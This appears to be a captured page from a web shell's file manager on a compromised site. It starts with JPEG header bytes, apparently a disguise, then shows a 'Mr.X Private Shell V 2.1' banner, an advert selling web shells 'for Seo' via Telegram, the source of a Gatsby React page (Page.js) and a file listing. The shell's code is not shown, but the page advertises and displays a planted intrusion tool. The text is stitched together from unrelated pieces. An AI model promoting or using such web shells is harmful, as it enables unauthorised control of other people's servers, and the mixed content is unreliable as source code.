����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import React from 'react'
import {graphql} from 'gatsby'
import styled from 'styled-components'
import FoundTypo from 'src/components/FoundTypo'
import Scripts from 'src/components/scripts'
const version = require('../../../package.json').version
const Content = styled.div`
max-width: 760px;
margin: auto;
padding: 0 30px 120px;
`
const Page = ({data}) => {
const pageData = data.markdownRemark
const html = pageData.html.replace(/@VERSION@/g, version)
.replace(/(npm-)+([a-zA-Z\\.-]*)(\((1|5|7)\))<\/h1>/, 'npm $2</h1>')
.replace(/([a-zA-Z\\.-]*)(\((1|5|7)\))<\/h1>/, '$1</h1>')
return (
<Content className='documentation'>
<div dangerouslySetInnerHTML={{ __html: html }} />
<FoundTypo />
<Scripts />
</Content>
)
}
export default Page
export const query = graphql`
query($slug: String!) {
markdownRemark(fields: { slug: { eq: $slug } }) {
html
fields {
slug
}
}
}
`
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Page.js | File | 960 B | 0644 |
|